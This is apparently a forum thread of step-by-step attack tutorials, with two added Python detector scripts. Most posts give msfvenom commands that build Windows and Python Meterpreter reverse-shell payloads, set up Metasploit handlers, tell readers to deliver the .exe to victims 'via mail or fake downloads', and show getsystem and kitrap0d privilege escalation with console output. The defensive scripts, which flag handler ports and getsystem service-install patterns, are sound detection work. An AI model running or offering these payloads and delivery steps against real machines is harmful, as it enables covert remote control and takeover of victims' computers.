Linux C&C Windows and Linux
How to Exploit Windows using Kali Linux
Step 1: Creating the Payload
To hack Windows we need to create a payload that will act as a backdoor for us to get into that PC. To create the payload for Windows, open a terminal and type
- Code:
sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=your-ip LPORT=5555 -f exe -o /var/www/html/win.exe
Start apache2 server to host the file
- Code:
sudo service apache2 start
Step 2: Starting the Metasploit Framework Console
For controlling the payload we need to start the Metasploit Framework Console, which is prebuilt in Kali Linux.
The Metasploit Framework Console has many payloads and many exploit methods.
To start the Metasploit Framework Console, in the terminal type
- Code:
msfconsole
Step 3: Choosing the Exploit Method
As I have said, the Metasploit Framework Console has many exploitation methods.
In this one we will use the multi handler.
Type
- Code:
use exploit/multi/handler
Step 4: Setting the Payload
In the above step we set our exploitation method. In this step we need to specify the payload that we have created.
Type
- Code:
set payload windows/meterpreter/reverse_tcp
Step 5: Providing the IP for Backdooring
In this step we need to provide the IP address of our machine so that the payload will connect to our system.
To find the IP address, open a terminal and type
- Code:
ifconfig
and copy your IP address.
Then we have to set it in the msfconsole, so type
- Code:
set LHOST (your ip address)
Step 6: Sending the File and Exploiting
After we have given all the information, we need to send the .exe file we created before to the victim via mail or fake downloads. Make sure that the victim installs the file.
After doing that, in the msfconsole, type
- Code:
exploit
Hacking Linux From Kali
Requirements:
1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)
STEPS:
1. Open terminal (CTRL + ALT + T)
2. We will utilize the Metasploit payload framework to create the exploit for this tutorial.
- Code:
msfvenom -p python/meterpreter/reverse_tcp LHOST= LPORT= -o /var/www/html/payloadname.py
As described above, the attacker IP address is 192.168.43.185; below is our screenshot when the command was executed.
3. Because our payload is reverse_tcp, where the attacker expects the victim to connect back to the attacker machine, the attacker needs to set up a handler to handle incoming connections on the port already specified above. Type msfconsole to go to the Metasploit console.
4. In the next step we need to configure the switches for the Metasploit payload we already specified in step 3.
- Code:
use exploit/multi/handler –> we will use the Metasploit handler
set payload python/meterpreter/reverse_tcp –> make sure the payload is the same as in step 2
set lhost 192.168.43.185 –> attacker IP address
set lport 4444 –> port to listen on for the reverse connection
exploit –> start listening for the incoming connection
Last edited by jamied_uk on 4th February 2022, 13:15; edited 5 times in total
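From the defender's side, both tutorials above come down to the same observable: the victim machine opens an outbound TCP connection to LHOST on LPORT (5555 and 4444 on this page) and keeps it open for as long as the Meterpreter session lasts. The script below is an added example, not part of the forum post, that scores connection-log rows for exactly that shape: a known handler port, or a long-lived connection to an unrecognised service on an unusual port. The log is constructed for this example in a Zeek conn.log-like tab-separated layout; the field names, the port sets and the 600-second threshold are assumptions a practitioner would tune to their own network.

```python
"""Spot reverse-TCP callbacks in connection logs.

Added example, not part of the forum post above and not Metasploit code.
The tutorial's payload connects back from the victim to the handler on
LHOST:LPORT. On the defender's side that is an outbound TCP connection
from a workstation to an unusual port, carrying no protocol the sensor
recognises, and it stays open for as long as the session lasts. The log
below is constructed in a Zeek conn.log-like layout (assumed field names).
"""
import ipaddress
from dataclasses import dataclass, field

# Ports the tutorial's handlers listen on, plus Metasploit's default LPORT.
KNOWN_HANDLER_PORTS = {4444, 4443, 5555}

# Services a workstation is expected to reach; anything else is unusual.
EXPECTED_PORTS = {22, 53, 80, 123, 139, 443, 445}

INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                 ipaddress.ip_network("192.168.0.0/16")]

# Constructed sample: one workstation, two callbacks and some normal traffic.
SAMPLE_CONN_LOG = """\
ts\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tservice\tduration
1700000000.1\t192.168.1.161\t49204\t192.168.1.71\t4443\ttcp\t-\t3600.2
1700000001.2\t192.168.1.161\t49210\t93.184.216.34\t443\ttcp\tssl\t2.1
1700000002.3\t192.168.1.161\t49211\t192.168.1.71\t80\ttcp\thttp\t0.4
1700000003.4\t192.168.1.161\t49212\t192.168.1.71\t5555\ttcp\t-\t1800.0
1700000004.5\t192.168.1.50\t49213\t192.168.1.1\t53\tudp\tdns\t0.01
"""


@dataclass
class Alert:
    orig_h: str
    resp_h: str
    resp_p: int
    reasons: list = field(default_factory=list)


def parse_conn_log(text):
    """Parse the header and rows into dicts; numeric fields are converted."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    header = lines[0].split("\t")
    rows = []
    for ln in lines[1:]:
        rec = dict(zip(header, ln.split("\t")))
        rec["id.orig_p"] = int(rec["id.orig_p"])
        rec["id.resp_p"] = int(rec["id.resp_p"])
        rec["duration"] = float(rec["duration"])
        rows.append(rec)
    return rows


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def callback_reasons(rec, min_duration=600.0):
    """Return the reasons a single connection looks like a reverse shell."""
    reasons = []
    if rec["proto"] != "tcp" or not is_internal(rec["id.orig_h"]):
        return reasons
    port = rec["id.resp_p"]
    if port in KNOWN_HANDLER_PORTS:
        reasons.append("destination port is a common Metasploit handler port")
    if (port not in EXPECTED_PORTS and rec["service"] == "-"
            and rec["duration"] >= min_duration):
        reasons.append("long-lived connection to an unrecognised service")
    return reasons


def find_callbacks(text, min_duration=600.0):
    """Scan a whole log and return one Alert per suspicious connection."""
    alerts = []
    for rec in parse_conn_log(text):
        reasons = callback_reasons(rec, min_duration)
        if reasons:
            alerts.append(Alert(rec["id.orig_h"], rec["id.resp_h"],
                                rec["id.resp_p"], reasons))
    return alerts


if __name__ == "__main__":
    for a in find_callbacks(SAMPLE_CONN_LOG):
        print(f"{a.orig_h} -> {a.resp_h}:{a.resp_p}: " + "; ".join(a.reasons))
```

Run against the constructed log it flags the two connections to ports 4443 and 5555 and leaves the HTTPS, HTTP and DNS rows alone. The port list catches only lazy defaults; the duration rule is what still fires when the handler is moved to 443 without TLS, which is why the two checks are kept separate.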
Re: Linux C&C Windows and Linux
To Enable Remote Desktop Server On Kali
To install and start
- Code:
sudo apt install -y xrdp && sudo service xrdp start && sudo service xrdp-sesman start
To auto start
- Code:
sudo update-rc.d xrdp enable
Re: Linux C&C Windows and Linux
More Reading
offensive-security.com/metasploit-unleashed/writing-meterpreter-scripts
offensive-security.com/metasploit-unleashed/custom-scripting
Re: Linux C&C Windows and Linux
More On Privilege Escalation
Privilege Escalation
Frequently, especially with client-side exploits, you will find that your session only has limited user rights. This can severely limit actions you can perform on the remote system such as dumping passwords, manipulating the registry, installing backdoors, etc. Fortunately, Metasploit has a Meterpreter script, getsystem, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system. There are also various other (local) exploits that can also be used to escalate privileges.
Using the infamous ‘Aurora’ exploit, we see that our Meterpreter session is only running as a regular user account.
msf exploit(ms10_002_aurora) >
[*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.1.161
[*] Sending stage (748544 bytes) to 192.168.1.161
[*] Meterpreter session 3 opened (192.168.1.71:38699 -> 192.168.1.161:4444) at 2010-08-21 13:39:10 -0600
msf exploit(ms10_002_aurora) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > getuid
Server username: XEN-XP-SP2-BARE\victim
meterpreter >
GetSystem
To make use of the getsystem command, if it's not already loaded we will need to first load the ‘priv’ extension.
meterpreter > use priv
Loading extension priv...success.
meterpreter >
Running getsystem with the -h switch will display the options available to us.
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t The technique to use. (Default to '0').
0 : All techniques available
1 : Service - Named Pipe Impersonation (In Memory/Admin)
2 : Service - Named Pipe Impersonation (Dropper/Admin)
3 : Service - Token Duplication (In Memory/Admin)
meterpreter >
We will let Metasploit try to do the heavy lifting for us by running getsystem without any options. The script will attempt every method available to it, stopping when it succeeds. Within the blink of an eye, our session is now running with SYSTEM privileges.
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Local Exploits
There are situations where getsystem fails. For example:
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter >
When this happens, we are able to background the session, and manually try some additional exploits that Metasploit has to offer. Note: The available exploits will change over time.
meterpreter > background
[*] Backgrounding session 1...
msf exploit(ms10_002_aurora) > use exploit/windows/local/
...snip...
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
...snip...
use exploit/windows/local/ms10_015_kitrap0d
use exploit/windows/local/ms10_092_schelevator
use exploit/windows/local/ms11_080_afdjoinleaf
use exploit/windows/local/ms13_005_hwnd_broadcast
use exploit/windows/local/ms13_081_track_popup_menu
...snip...
msf exploit(ms10_002_aurora) >
Let’s try and use the famous kitrap0d exploit on our target. Our example box is a 32-bit machine and is listed as one of the vulnerable targets…
msf exploit(ms10_002_aurora) > use exploit/windows/local/ms10_015_kitrap0d
msf exploit(ms10_015_kitrap0d) > set SESSION 1
msf exploit(ms10_015_kitrap0d) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_015_kitrap0d) > set LHOST 192.168.1.161
msf exploit(ms10_015_kitrap0d) > set LPORT 4443
msf exploit(ms10_015_kitrap0d) > show options
Module options (exploit/windows/local/ms10_015_kitrap0d):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
LHOST 192.168.1.161 yes The listen address
LPORT 4443 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 2K SP4 - Windows 7 (x86)
msf exploit(ms10_015_kitrap0d) > exploit
[*] Started reverse handler on 192.168.1.161:4443
[*] Launching notepad to host the exploit...
[+] Process 4048 launched.
[*] Reflectively injecting the exploit DLL into 4048...
[*] Injecting exploit into 4048 ...
[*] Exploit injected. Injecting payload into 4048...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (769024 bytes) to 192.168.1.71
[*] Meterpreter session 2 opened (192.168.1.161:4443 -> 192.168.1.71:49204) at 2014-03-11 11:14:00 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
offensive-security.com/metasploit-unleashed/privilege-escalation/
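The getsystem help text above lists techniques 1 and 2 as "Named Pipe Impersonation". Both register a throw-away Windows service to get a SYSTEM token, and a service registration leaves a System log Event ID 7045 ("A service was installed in the system") whether or not the session notices. The script below is an added example, not part of this thread and not Metasploit code, that scans such events for the two shapes these techniques leave behind. The ImagePath forms it looks for (a command shell echoing into \\.\pipe\<name> for the in-memory variant, and rundll32.exe <dll>,a /p:<name> for the dropper variant), the random-letter service name heuristic, the JSON-lines record layout and the sample events are all assumptions made for this example.

```python
"""Flag service installs that match getsystem's named-pipe impersonation.

Added example, not part of the forum post and not Metasploit code. The
help text above lists techniques 1 and 2 as "Named Pipe Impersonation";
both register a throw-away Windows service, which leaves a System log
Event ID 7045. Technique 1 (in memory) is assumed to run an ImagePath of
the form cmd.exe /c echo <rand> > \\.\pipe\<rand>; technique 2 (dropper)
to run rundll32.exe <dll>,a /p:<rand>. The record layout (one JSON object
per line with ServiceName/ImagePath fields) and the events are constructed.
"""
import json
import re
from dataclasses import dataclass

# Technique 1: a command shell echoing into a named pipe.
PIPE_ECHO = re.compile(
    r"(?:cmd\.exe|%COMSPEC%)\s+/c\s+echo\s+\S+\s*>\s*\\\\\.\\pipe\\", re.I)
# Technique 2: rundll32 calling export 'a' with a /p:<pipe> argument.
PIPE_RUNDLL = re.compile(r"rundll32(?:\.exe)?\s+\S+,a\s+/p:\S+", re.I)
# Heuristic (assumed): the throw-away service gets a random all-letter name.
RANDOM_NAME = re.compile(r"^[A-Za-z]{8,16}$")

# Constructed sample events (JSON lines); backslashes are JSON-escaped.
SAMPLE_EVENTS = r"""
{"EventID": 7045, "ServiceName": "JRqlzbXkOwPc", "ImagePath": "cmd.exe /c echo fhbqzwq > \\\\.\\pipe\\fhbqzwq", "AccountName": "LocalSystem"}
{"EventID": 7045, "ServiceName": "Sysmon64", "ImagePath": "C:\\Windows\\Sysmon64.exe", "AccountName": "LocalSystem"}
{"EventID": 7036, "ServiceName": "Sysmon64", "Message": "entered the running state"}
{"EventID": 7045, "ServiceName": "kYtBmQpLwxZa", "ImagePath": "rundll32.exe C:\\Users\\victim\\AppData\\Local\\Temp\\HXkTp.dll,a /p:nfgVqsd", "AccountName": "LocalSystem"}
"""


@dataclass
class Alert:
    service_name: str
    image_path: str
    tags: list


def classify(event):
    """Return detection tags for one event; empty means it looks benign."""
    if event.get("EventID") != 7045:
        return []
    path = event.get("ImagePath", "")
    tags = []
    if PIPE_ECHO.search(path):
        tags.append("pipe_echo")          # technique 1 shape
    if PIPE_RUNDLL.search(path):
        tags.append("rundll32_pipe")      # technique 2 shape
    # The name heuristic only corroborates; on its own it would be noisy.
    if tags and RANDOM_NAME.match(event.get("ServiceName", "")):
        tags.append("random_name")
    return tags


def scan_events(jsonl):
    """Parse JSON-lines service events and return one Alert per match."""
    alerts = []
    for line in jsonl.strip().splitlines():
        event = json.loads(line)
        tags = classify(event)
        if tags:
            alerts.append(Alert(event["ServiceName"], event["ImagePath"], tags))
    return alerts


if __name__ == "__main__":
    for a in scan_events(SAMPLE_EVENTS):
        print(f"{a.service_name}: {', '.join(a.tags)}  <- {a.image_path}")
```

On the constructed events it raises two alerts, one per technique, and ignores the legitimate Sysmon service and the 7036 state-change record. Because the service exists only for the instant the token is stolen, the 7045 event is often the only trace left, so this is worth forwarding from every endpoint rather than only from servers.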